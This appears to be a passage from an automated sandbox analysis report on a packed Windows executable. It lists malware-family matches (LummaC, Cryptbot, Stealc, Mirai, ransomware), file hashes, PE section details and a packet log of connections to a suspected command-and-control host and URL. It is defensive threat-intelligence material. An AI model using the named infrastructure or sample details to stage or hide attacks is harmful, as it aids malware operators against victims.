                          • Successful, ratio: 100%
                          HCA Information:Failed
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
5.101.3.217 | lolvgcpX19.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
5.101.3.217 | w6cYYyWXqJ.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
5.101.3.217 | mBr65h6L4w.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
5.101.3.217 | HrIrtCXI3s.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
3.218.7.103 | lolvgcpX19.exe | malicious | Unknown |
3.218.7.103 | w6cYYyWXqJ.exe | malicious | Unknown |
3.218.7.103 | E6rBvcWFWu.exe | malicious | Unknown |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
httpbin.org | lolvgcpX19.exe | malicious | Unknown | 3.218.7.103
httpbin.org | 8wiUGtm9UM.exe | malicious | LummaC | 34.226.108.155
httpbin.org | w6cYYyWXqJ.exe | malicious | Unknown | 3.218.7.103
httpbin.org | mBr65h6L4w.exe | malicious | Unknown | 34.226.108.155
httpbin.org | HrIrtCXI3s.exe | malicious | Unknown | 34.226.108.155
httpbin.org | vJPhYDClT5.exe | malicious | Unknown | 34.226.108.155
httpbin.org | jklg6EIhyR.exe | malicious | Unknown | 34.226.108.155
httpbin.org | qr2JeuLuOQ.exe | malicious | Unknown | 34.226.108.155
httpbin.org | E6rBvcWFWu.exe | malicious | Unknown | 3.218.7.103
httpbin.org | gDPzgKHFws.exe | malicious | Cryptbot | 34.226.108.155
home.fiveth5ht.top | lolvgcpX19.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | w6cYYyWXqJ.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | mBr65h6L4w.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | HrIrtCXI3s.exe | malicious | Unknown | 5.101.3.217
Match | Associated Sample Name / URL | Detection | Threat Name | Context
PINDC-ASRU | lolvgcpX19.exe | malicious | Unknown | 5.101.3.217
PINDC-ASRU | w6cYYyWXqJ.exe | malicious | Unknown | 5.101.3.217
PINDC-ASRU | mBr65h6L4w.exe | malicious | Unknown | 5.101.3.217
PINDC-ASRU | HrIrtCXI3s.exe | malicious | Unknown | 5.101.3.217
PINDC-ASRU | 6ufJvua5w2.exe | malicious | CryptOne, Stealc, Vidar | 91.215.85.11
PINDC-ASRU | Ransomware Mallox.exe | malicious | Targeted Ransomware | 91.215.85.142
PINDC-ASRU | 3cb770h94r.elf | malicious | Okiru | 45.145.172.130
PINDC-ASRU | na.elf | malicious | Mirai | 5.188.210.194
PINDC-ASRU | na.elf | malicious | Mirai, Moobot | 5.8.21.138
PINDC-ASRU | lK1DKi27B4.dll | malicious | Unknown | 80.87.206.189
AMAZON-AESUS | lolvgcpX19.exe | malicious | Unknown | 3.218.7.103
AMAZON-AESUS | 8wiUGtm9UM.exe | malicious | LummaC | 34.226.108.155
AMAZON-AESUS | w6cYYyWXqJ.exe | malicious | Unknown | 3.218.7.103
AMAZON-AESUS | db0fa4b8db0333367e9bda3ab68b8042.x86.elf | malicious | Gafgyt, Mirai | 50.17.226.153
AMAZON-AESUS | mBr65h6L4w.exe | malicious | Unknown | 34.226.108.155
AMAZON-AESUS | HrIrtCXI3s.exe | malicious | Unknown | 34.226.108.155
AMAZON-AESUS | vJPhYDClT5.exe | malicious | Unknown | 34.226.108.155
AMAZON-AESUS | jklg6EIhyR.exe | malicious | Unknown | 34.226.108.155
AMAZON-AESUS | qr2JeuLuOQ.exe | malicious | Unknown | 34.226.108.155
AMAZON-AESUS | E6rBvcWFWu.exe | malicious | Unknown | 3.218.7.103
                                No context
                                No context
                                No created / dropped files found
                                File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                Entropy (8bit):7.985111161252114
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • VXD Driver (31/22) 0.00%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:xXe4fTmV2h.exe
                                File size:4'450'816 bytes
                                MD5:764767d6adf6fa8a9c0b437d79a7a973
                                SHA1:f06803c1321e1b613f494e337a3e7b6c11f2e880
                                SHA256:f938e11a28c63ca465cec4151a02add7ff1f534d31eb8ad1e4e765620da43762
                                SHA512:961330c1e2c92edcce9c845e1c038215c772b5b838785d4fccfd54a037c7145341edfc8a0ce560166d4adddf066289691ec4176b43d559b2b0da9eac7b4cd3ef
                                SSDEEP:98304:x9GpNaOCU/IL0l0xW0Qs/Sy2rETtfzX13+BYoL2:x9GpN55UW0QIAriJ8Yo
                                TLSH:C0263348BD143DA6E4EE84B080B3601DF3F527825A6AE1EC0DC6674D7967384FEE5836
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2........... I...@...................................D...@... ............................
                                Icon Hash:90cececece8e8eb0
                                Entrypoint:0x101b000
                                Entrypoint Section:.taggant
                                Digitally signed:true
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                DLL Characteristics:DYNAMIC_BASE
                                Time Stamp:0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                Signature Valid:
                                Signature Issuer:
                                Signature Validation Error:
                                Error Number:
                                Not Before, Not After
                                  Subject Chain
                                    Version:
                                    Thumbprint MD5:
                                    Thumbprint SHA-1:
                                    Thumbprint SHA-256:
                                    Serial:
                                    Instruction
                                    jmp 00007FB0A4EF8F2Ah
                                    bswap eax
                                    inc ebx
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add cl, ch
                                    add byte ptr [eax], ah
                                    add byte ptr [eax], al
                                    add byte ptr [ecx], al
                                    or al, byte ptr [eax]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], dh
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax+eax*4], cl
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    adc byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add eax, 0000000Ah
                                    add byte ptr [eax], al
                                    add byte ptr [eax], dh
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax+00h], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add dword ptr [eax+00000000h], eax
                                    add byte ptr [eax], al
                                    adc byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add eax, 0000000Ah
                                    add byte ptr [eax], al
                                    add byte ptr [eax], dh
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [edx], ah
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [ecx], al
                                    add byte ptr [eax], 00000000h
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    adc byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    pop es
                                    or al, byte ptr [eax]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax+0Ah], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    or al, 80h
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6dd05f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6dc000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x708a00 | 0x688 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc191d8 | 0x10 | mizvqalk
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc19188 | 0x18 | mizvqalk
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x6db000 | 0x288a00 | 209c84acdb3b42c53790cf5252ba749e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x6dc000 | 0x1ac | 0x200 | 51464645db0f03772ae3ac4890f37dff | False | 0.58203125 | data | 4.594935129031665 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x6dd000 | 0x1000 | 0x200 | 6363462e4ea156e03144265f6be7871e | False | 0.166015625 | data | 1.1763897754724144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x6de000 | 0x389000 | 0x200 | d60579a50c6c439d428bafff4bc9f679 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
mizvqalk | 0xa67000 | 0x1b3000 | 0x1b2400 | a10c934d2243881ac69caadeee5a055f | False | 0.9943081642199194 | data | 7.9554844362049995 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
acywuead | 0xc1a000 | 0x1000 | 0x400 | e69b565e97f26ccd0d9ed18206ac5527 | False | 0.8046875 | data | 6.269331223390831 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xc1b000 | 0x3000 | 0x2200 | a11d2da9382e837e0b35a32100110694 | False | 0.07755055147058823 | DOS executable (COM) | 1.0204033753989519 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xc191e8 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 27, 2024 08:47:44.477300882 CET | 49708 | 443 | 192.168.2.11 | 3.218.7.103
Dec 27, 2024 08:47:44.477365017 CET | 443 | 49708 | 3.218.7.103 | 192.168.2.11
Dec 27, 2024 08:47:44.477426052 CET | 49708 | 443 | 192.168.2.11 | 3.218.7.103
Dec 27, 2024 08:47:44.491295099 CET | 49708 | 443 | 192.168.2.11 | 3.218.7.103
Dec 27, 2024 08:47:44.491345882 CET | 443 | 49708 | 3.218.7.103 | 192.168.2.11
Dec 27, 2024 08:47:46.289877892 CET | 443 | 49708 | 3.218.7.103 | 192.168.2.11
Dec 27, 2024 08:47:46.306855917 CET | 49708 | 443 | 192.168.2.11 | 3.218.7.103
Dec 27, 2024 08:47:46.306870937 CET | 443 | 49708 | 3.218.7.103 | 192.168.2.11
Dec 27, 2024 08:47:46.309175014 CET | 443 | 49708 | 3.218.7.103 | 192.168.2.11
Dec 27, 2024 08:47:46.309267998 CET | 49708 | 443 | 192.168.2.11 | 3.218.7.103
Dec 27, 2024 08:47:46.311377048 CET | 49708 | 443 | 192.168.2.11 | 3.218.7.103
Dec 27, 2024 08:47:46.311495066 CET | 443 | 49708 | 3.218.7.103 | 192.168.2.11
Dec 27, 2024 08:47:46.319449902 CET | 49708 | 443 | 192.168.2.11 | 3.218.7.103
Dec 27, 2024 08:47:46.319458008 CET | 443 | 49708 | 3.218.7.103 | 192.168.2.11
Dec 27, 2024 08:47:46.371233940 CET | 49708 | 443 | 192.168.2.11 | 3.218.7.103
Dec 27, 2024 08:47:46.707123995 CET | 443 | 49708 | 3.218.7.103 | 192.168.2.11
Dec 27, 2024 08:47:46.707266092 CET | 443 | 49708 | 3.218.7.103 | 192.168.2.11
Dec 27, 2024 08:47:46.707350969 CET | 49708 | 443 | 192.168.2.11 | 3.218.7.103
Dec 27, 2024 08:47:46.740154028 CET | 49708 | 443 | 192.168.2.11 | 3.218.7.103
Dec 27, 2024 08:47:46.740164042 CET | 443 | 49708 | 3.218.7.103 | 192.168.2.11
Dec 27, 2024 08:47:48.585196018 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:48.704951048 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:48.705384016 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:48.713882923 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:48.833441973 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:48.833476067 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:48.833542109 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:48.833554983 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:48.833581924 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:48.833581924 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:48.833596945 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:48.833620071 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:48.833651066 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:48.833664894 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:48.833704948 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:48.833717108 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:48.833815098 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:48.833836079 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:48.833852053 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:48.833863974 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:48.833865881 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:48.833884001 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:48.833913088 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:48.953403950 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:48.953423023 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:48.953444958 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:48.953525066 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:48.953577042 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:48.953619003 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:48.953634024 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:48.953663111 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:48.953684092 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:48.953690052 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:48.953738928 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:48.996948957 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:48.997076035 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:49.116816998 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.116972923 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:49.160859108 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.160979986 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:49.276823997 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.365113020 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.365171909 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:49.608906984 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.608958960 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:49.758327961 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.758510113 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:49.758605003 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:49.878144979 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.878160000 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.878204107 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.878248930 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:49.878252983 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.878299952 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:49.878323078 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.878349066 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.878360033 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:49.878398895 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:49.878451109 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.878470898 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.878496885 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:49.878511906 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:49.878655910 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.878667116 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.878709078 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:49.878787994 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.878798008 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.878834963 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:49.878998995 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.879064083 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:49.879149914 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.879188061 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:49.879219055 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.879230022 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.879240990 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.879354000 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.879405022 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.879522085 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.879641056 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.879657030 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.879738092 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.879791975 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.879888058 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.880055904 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.880110979 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.880156040 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.880290031 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.880331039 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:49.880351067 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.880381107 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:49.880398989 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.880417109 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:49.880438089 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:49.880522966 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.880579948 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:49.997952938 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.997972012 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.998064995 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:49.998121023 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.998162985 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:49.998205900 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.998322010 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.998457909 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.998620987 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:49.998806953 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
                                    Dec 27, 2024 08:47:49.998817921 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.998848915 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.998970032 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.998980045 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.999136925 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.999145985 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.999165058 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.999268055 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.999278069 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.999351025 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.999365091 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.999618053 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.999902010 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.999912977 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.999959946 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.999991894 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000035048 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.000036955 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000077963 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.000158072 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000200987 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.000207901 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000246048 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000248909 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.000288010 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.000369072 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000387907 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000411034 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.000422955 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.000426054 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000463963 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.000494957 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000535011 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.000566959 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000605106 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.000643969 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000685930 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000782967 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000792980 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000875950 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000897884 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001019955 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001055002 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001082897 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001168966 CET80497105.101.3.217192.168.2.11
